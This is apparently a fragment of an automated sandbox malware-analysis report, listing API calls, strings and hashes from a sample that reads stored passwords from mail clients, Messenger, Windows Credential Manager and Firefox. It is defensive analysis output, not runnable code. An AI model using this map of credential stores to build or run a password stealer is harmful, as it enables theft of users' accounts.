                  • RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
                  • memset.MSVCRT ref: 0040DDA1
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040DDCE
                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?,?,?), ref: 0040DDF7
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,?,00000000,000000FF,00000000,00000000), ref: 0040DE70
                  • LocalFree.KERNEL32(00000001), ref: 0040DE83
                  • RegCloseKey.ADVAPI32(?), ref: 0040DE8E
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
                  • RegCloseKey.ADVAPI32(?), ref: 0040DEB6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password$p@
                  • API String ID: 551151806-2386532916
                  APIs
                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040E370), ref: 0040E75E
                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E777
                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E788
                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E799
                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E7AA
                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E7BB
                  • FreeLibrary.KERNEL32(00000000), ref: 0040E7DB
                  Strings
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                  • API String ID: 2449869053-232097475
                  APIs
                  • memset.MSVCRT ref: 0040266D
                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                  • strcpy.MSVCRT(?,?,?,?,?,76DBEB20,?,00000000), ref: 004026AB
                  • strcpy.MSVCRT(?,?), ref: 00402768
                  Strings
                  Yara matches
                  Similarity
                  • API ID: strcpy$QueryValuememset
                  • String ID: ,6A$47A$<6A$H6A$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Server$T6A$d6A$p6A$6A
                  • API String ID: 3373037483-299461207
                  APIs
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • strlen.MSVCRT ref: 00410BF5
                  • ??2@YAPAXI@Z.MSVCRT ref: 00410C05
                  • memset.MSVCRT ref: 00410C51
                  • memset.MSVCRT ref: 00410C6E
                  • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00410C9C
                  • RegCloseKey.ADVAPI32(?), ref: 00410CE0
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410D31
                  • LocalFree.KERNEL32(?), ref: 00410D46
                  • ??3@YAXPAX@Z.MSVCRT ref: 00410D4F
                    • Part of subcall function 00406541: strtoul.MSVCRT ref: 00406549
                  Strings
                  • Software\Microsoft\Windows Live Mail, xrefs: 00410C90
                  • Software\Microsoft\Windows Mail, xrefs: 00410C84
                  • Salt, xrefs: 00410CCA
                  Yara matches
                  Similarity
                  • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                  • API String ID: 1673043434-2687544566
                  APIs
                  Strings
                  Yara matches
                  Similarity
                  • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                  • API String ID: 4281260487-2229823034
                  APIs
                  Strings
                  Yara matches
                  Similarity
                  • API ID: _stricmp_strnicmpmemsetsprintf
                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                  • API String ID: 2822975062-2229823034
                  APIs
                  • memset.MSVCRT ref: 00402837
                    • Part of subcall function 00402963: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 00402994
                  • strcpy.MSVCRT(?,?,76DBEB20,?,00000000), ref: 00402871
                    • Part of subcall function 00402963: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029C2
                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,76DBEB20,?,00000000), ref: 0040293C
                    • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                  Strings
                  Yara matches
                  Similarity
                  • API ID: QueryValuestrcpy$ByteCharMultiWidememset
                  • String ID: 8A$48A$<6A$Display Name$Email$H6A$SMTP Port$SMTP Server$d6A$t7A$7A
                  • API String ID: 1302727986-2717830028
                  APIs
                  • sprintf.MSVCRT ref: 0040822E
                  • LoadMenuA.USER32(?,?), ref: 0040823C
                    • Part of subcall function 00408065: GetMenuItemCount.USER32(?), ref: 0040807A
                    • Part of subcall function 00408065: memset.MSVCRT ref: 0040809B
                    • Part of subcall function 00408065: GetMenuItemInfoA.USER32 ref: 004080D6
                    • Part of subcall function 00408065: strchr.MSVCRT ref: 004080ED
                  • DestroyMenu.USER32(00000000), ref: 0040825A
                  • sprintf.MSVCRT ref: 0040829E
                  • CreateDialogParamA.USER32(?,00000000,00000000,00408208,00000000), ref: 004082B3
                  • memset.MSVCRT ref: 004082CF
                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 004082E0
                  • EnumChildWindows.USER32(00000000,Function_00008155,00000000), ref: 00408308
                  • DestroyWindow.USER32(00000000), ref: 0040830F
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                  • String ID: caption$dialog_%d$menu_%d
                  • API String ID: 3259144588-3822380221
                  APIs
                  • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 004083FC
                  • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 0040840C
                    • Part of subcall function 00407FBF: memset.MSVCRT ref: 00407FE4
                    • Part of subcall function 00407FBF: GetPrivateProfileStringA.KERNEL32(004182C0,00000104,0041344F,?,00001000,004181B8), ref: 00408008
                    • Part of subcall function 00407FBF: WritePrivateProfileStringA.KERNEL32(004182C0,?,?,004181B8), ref: 0040801F
                  • EnumResourceNamesA.KERNEL32(00000104,00000004,0040820D,00000000), ref: 00408442
                  • EnumResourceNamesA.KERNEL32(00000104,00000005,0040820D,00000000), ref: 0040844C
                  • strcpy.MSVCRT(004182C0,strings,?,00408515,00000000,?,00000000,00000104,?), ref: 00408454
                  • memset.MSVCRT ref: 00408470
                  • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 00408484
                    • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                  • String ID: O4A$TranslatorName$TranslatorURL$general$strings
                  • API String ID: 1060401815-2553245061
                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040E377), ref: 0040E6D6
                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E6EF
                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E700
                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E711
                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E722
                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E733
                  Strings
                  Yara matches
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                  • API String ID: 667068680-3953557276
                  APIs
                    • Part of subcall function 004046CC: FreeLibrary.KERNEL32(?,00404659,?,0040DC5F,80000001,76DBEC10), ref: 004046D3
                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,76DBEC10), ref: 0040465E
                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                  • GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                  Strings
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                  • API String ID: 2449869053-4258758744
                  APIs
                  • memset.MSVCRT ref: 004116E3
                    • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                  • strlen.MSVCRT ref: 004116FF
                  • memset.MSVCRT ref: 00411739
                  • memset.MSVCRT ref: 0041174D
                  • memset.MSVCRT ref: 00411761
                  • memset.MSVCRT ref: 00411787
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                    • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                  • memcpy.MSVCRT ref: 004117BE
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                  • memcpy.MSVCRT ref: 004117FA
                  • memcpy.MSVCRT ref: 0041180C
                  • strcpy.MSVCRT(?,?), ref: 004118E3
                  • memcpy.MSVCRT ref: 00411914
                  • memcpy.MSVCRT ref: 00411926
                  Strings
                  Yara matches
                  Similarity
                  • API ID: memcpymemset$strlen$strcpy
                  • String ID: salu
                  • API String ID: 2660478486-4177317985
                  APIs
                  • wcsstr.MSVCRT ref: 004042C7
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 0040430E
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404322
                  • strcpy.MSVCRT(?,?), ref: 00404332
                  • strcpy.MSVCRT(?,?,?,?), ref: 00404345
                  • strchr.MSVCRT ref: 00404353
                  • strlen.MSVCRT ref: 00404367
                  • sprintf.MSVCRT ref: 00404388
                  • strchr.MSVCRT ref: 00404399
                  Strings
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                  • String ID: %s@gmail.com$www.google.com
                  • API String ID: 1359934567-4070641962
                  APIs
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  • memset.MSVCRT ref: 00403ECF
                  • memset.MSVCRT ref: 00403EE3
                  • memset.MSVCRT ref: 00403EF7
                  • sprintf.MSVCRT ref: 00403F18
                  • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F34
                  • sprintf.MSVCRT ref: 00403F6B
                  • sprintf.MSVCRT ref: 00403F9C
                  Strings
                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA7
                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F46
                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F12
                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F96
                  • <table dir="rtl"><tr><td>, xrefs: 00403F2E
                  Yara matches
                  Similarity
                  • API ID: memsetsprintf$FileWritestrcpystrlen
                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                  • API String ID: 1043021993-1670831295
                  APIs
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 00402C5E
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • RegCloseKey.ADVAPI32(?), ref: 00402D60
                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                  • memset.MSVCRT ref: 00402CB8
                  • sprintf.MSVCRT ref: 00402CD1
                  • sprintf.MSVCRT ref: 00402D0F
                    • Part of subcall function 00402B92: memset.MSVCRT ref: 00402BB2
                    • Part of subcall function 00402B92: RegCloseKey.ADVAPI32 ref: 00402C16
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Closememset$sprintf$EnumOpen
                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                  • API String ID: 1831126014-3814494228
                  • Opcode ID: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                  • Instruction ID: 6132c75c80fc905e8fcbbac6237d45e27d646b3e48d82405447337ab985425ff
                  • Opcode Fuzzy Hash: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                  • Instruction Fuzzy Hash: 66314072D0011DBADB21EA91CD42EEF7B7CAF18345F0404BABA14F2091E7B49F888B54
                  APIs
                  • strcpy.MSVCRT(?,Common Programs,0040F56A,?,?,?,?,?,00000104), ref: 0040F4BF
                  Strings
                  Yara matches
                  Similarity
                  • API ID: strcpy
                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                  • API String ID: 3177657795-318151290
                  • Opcode ID: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                  • Instruction ID: 3fcc29bccd1c625ad2997487a879199120d1d943b4c0761a6650e27991626466
                  • Opcode Fuzzy Hash: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                  • Instruction Fuzzy Hash: B9F01D732BEE0A60D43405681F06EF70402A0F17553BA86336D42F5ED6E9BC888E60AF
                  APIs
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 00402FDF
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • memset.MSVCRT ref: 0040302C
                  • sprintf.MSVCRT ref: 00403044
                  • memset.MSVCRT ref: 00403075
                  • RegCloseKey.ADVAPI32(?), ref: 004030BD
                  • RegCloseKey.ADVAPI32(?), ref: 004030E6
                  Strings
                  Yara matches
                  Similarity
                  • API ID: memset$Close$EnumOpensprintf
                  • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                  • API String ID: 3672803090-3168940695
                  • Opcode ID: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                  • Instruction ID: 768b3681e431995c61ece500f3f0ca2292d3b8ebaed2eb0df27a6a0be2325633
                  • Opcode Fuzzy Hash: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                  • Instruction Fuzzy Hash: 27316FB680020DBFDB21EB51CC81EEE7B7CAF14344F0041B6B908A1151E7799F989F65
                  APIs
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                  • String ID: 0$6
                  • API String ID: 1757351179-3849865405
                  • Opcode ID: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                  • Instruction ID: b54eda8ed3125ae11668051ec90bd02c66b6cc1d7fa6bc8d4742b266666783d1
                  • Opcode Fuzzy Hash: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                  • Instruction Fuzzy Hash: 01319E7280C384AFD7209F55D84099BBBE9FF88354F14893EF59492250D379EA44CB6B
                  APIs
                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F02A
                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                  • memcpy.MSVCRT ref: 0040F075
                  • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                  Strings
                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F01E
                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040F032
                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F025
                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F011
                  Yara matches
                  Similarity
                  • API ID: FromStringUuid$FreeTaskmemcpy
                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                  • API String ID: 1640410171-2022683286
                  • Opcode ID: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                  • Instruction ID: b02d4c6ee9d97a63d35e72255114f680a0148db4ebcc5a4c1265e43ba903851c
                  • Opcode Fuzzy Hash: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                  • Instruction Fuzzy Hash: 8C115B7251012EAACB21EEA4DD40EFB37ECAB48354F050537FD41E3241EA74E9598BA9
                  APIs
                  • LoadLibraryA.KERNEL32(comctl32.dll,76F90A60,?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404860
                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404886
                  • #17.COMCTL32(?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404894
                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004048B1
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeLoadMessageProc
                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                  • API String ID: 2780580303-317687271
                  • Opcode ID: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
                  • Instruction ID: fc2202cf77027b42572104eeb985269ec1b891a521d9ed4889cd7b549b4d3d81
                  • Opcode Fuzzy Hash: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
                  • Instruction Fuzzy Hash: E001D6767906527BD7116FA09C4ABAF7EECDB85B4BB008435F602F1180EA78DE02825C
                  APIs
                  • GetModuleHandleA.KERNEL32(nss3.dll,76F91620,?,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E516
                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E51F
                  • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E528
                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E537
                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E53E
                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E545
                  Strings
                  Yara matches
                  Similarity
                  • API ID: FreeHandleLibraryModule
                  • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                  • API String ID: 662261464-3550686275
                  • Opcode ID: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
                  • Instruction ID: d135409c02d172e6769d1cedb18aaef1940c31153c91c0802dc404148c0ad013
                  • Opcode Fuzzy Hash: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
                  • Instruction Fuzzy Hash: 31E048E6B4133D7689106AF65C44DBBAE5CC885AE63150877AD0473284EEA99D0186F8
                  APIs
                  • strchr.MSVCRT ref: 0040E7FB
                  • strcpy.MSVCRT(?,-00000001), ref: 0040E809
                    • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A13
                    • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A1B
                    • Part of subcall function 00406A01: _memicmp.MSVCRT ref: 00406A39
                  • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E859
                  • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E864
                  • memset.MSVCRT ref: 0040E840
                    • Part of subcall function 0040632F: GetWindowsDirectoryA.KERNEL32(00418550,00000104,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406344
                    • Part of subcall function 0040632F: strcpy.MSVCRT(00000000,00418550,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406354
                  • memset.MSVCRT ref: 0040E888
                  • memcpy.MSVCRT ref: 0040E8A3
                  • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E8AE
                  Strings
                  Yara matches
                  Similarity
                  • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                  • String ID: \systemroot
                  • API String ID: 1680921474-1821301763
                  • Opcode ID: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
                  • Instruction ID: 059b6355fafdf26fa7c647f60efba09ddadb95c968e3db809f61c631ea6cdf1b
                  • Opcode Fuzzy Hash: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
                  • Instruction Fuzzy Hash: D321DA725082446DF764B2628D82FEB66EC5B19344F10446FF685E10C1EAFC99D4862A
                  APIs
                  • GetClientRect.USER32(?,?), ref: 00405C05
                  • GetWindow.USER32(?,00000005), ref: 00405C1D
                  • GetWindow.USER32(00000000), ref: 00405C20
                    • Part of subcall function 00401601: GetWindowRect.USER32(?,?), ref: 00401610
                    • Part of subcall function 00401601: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040162B
                  • GetWindow.USER32(00000000,00000002), ref: 00405C2C
                  • GetDlgItem.USER32(?,000003ED), ref: 00405C43
                  • GetDlgItem.USER32(?,00000000), ref: 00405C55
                  • GetDlgItem.USER32(?,00000000), ref: 00405C67
                  • GetDlgItem.USER32(?,00000000), ref: 00405C79
                  • GetDlgItem.USER32(?,000003ED), ref: 00405C87
                  • SetFocus.USER32(00000000), ref: 00405C8A
                  Yara matches
                  Similarity
                  • API ID: ItemWindow$Rect$ClientFocusPoints
                  • String ID:
                  • API String ID: 2187283481-0
                  • Opcode ID: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                  • Instruction ID: 70b7e768433fb03072553d07e5bd29f06e019e0bb4b5ab736e3f65cd75bfe615
                  • Opcode Fuzzy Hash: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                  • Instruction Fuzzy Hash: 09118271500304ABDB216F31CC89E5BBFADEF81715F05883AB444AB1A1CB7DD8018B28
                  APIs
                  Strings
                  Yara matches
                  Similarity
                  • API ID: free$strlen
                  • String ID:
                  • API String ID: 667451143-3916222277
                  • Opcode ID: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                  • Instruction ID: 0a6132ce2dc9cc3df9a7f1a3dcc42749ccde8b25e91b24a7214be5fd0ed86434
                  • Opcode Fuzzy Hash: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                  • Instruction Fuzzy Hash: A7619A30409781DFDB209F25848006BBBF1FB89315F909D7FF5D5A22A1E739A846CB0A
                  APIs
                    • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,76DBEC10), ref: 0040465E
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                  • wcslen.MSVCRT ref: 0040782F
                  • wcsncmp.MSVCRT(?,?,?), ref: 00407873
                  • memset.MSVCRT ref: 00407907
                  • memcpy.MSVCRT ref: 0040792B
                  • wcschr.MSVCRT ref: 0040797F
                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004079A9
                    • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                  Strings
                  Yara matches
                  Similarity
                  • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                  • String ID: J$Microsoft_WinInet
                  • API String ID: 2413121283-260894208
                  • Opcode ID: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                  • Instruction ID: 0e9b9eaeb9102773f5efe30ff018f7355b1463afce593653dd7f5536c2c1a2ca
                  • Opcode Fuzzy Hash: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                  • Instruction Fuzzy Hash: 5E51E3B1A083469FD710DF65C880A9BB7E8BF89304F00492EF999D3250E778E955CB97
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 004055C0
                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055D9
                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055E6
                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055F2
                  • memset.MSVCRT ref: 0040565C
                  • SendMessageA.USER32(?,00001019,?,?), ref: 0040568D
                  • SetFocus.USER32(?), ref: 00405712
                  Strings
                  Yara matches
                  Similarity
                  • API ID: MessageSend$FocusItemmemset
                  • String ID: O4A
                  • API String ID: 4281309102-1047957790
                  • Opcode ID: f40dfee95efd54d32f2af3622bff62bd61e387c9aa4c7d82b7cdafa9f0be41ac
                  • Instruction ID: 7cc6a8daf3229b7d8e0d7717536759f0385f0427a9067e31b35bb84d252c6e93
                  • Opcode Fuzzy Hash: f40dfee95efd54d32f2af3622bff62bd61e387c9aa4c7d82b7cdafa9f0be41ac
                  • Instruction Fuzzy Hash: 3D414BB5D00109BFDB209F98DC85DAEBBB9EF04358F00846AE914B7291D7759E50CF94
                  APIs
                  • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,76DBEC10), ref: 0040DB33
                  • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040DC08
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • memcpy.MSVCRT ref: 0040DBA4
                  • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040DBB6
                  • RegCloseKey.ADVAPI32(?), ref: 0040DC2A
                  Strings
                  Yara matches
                  Similarity
                  • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                  • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                  • API String ID: 3289975857-105384665
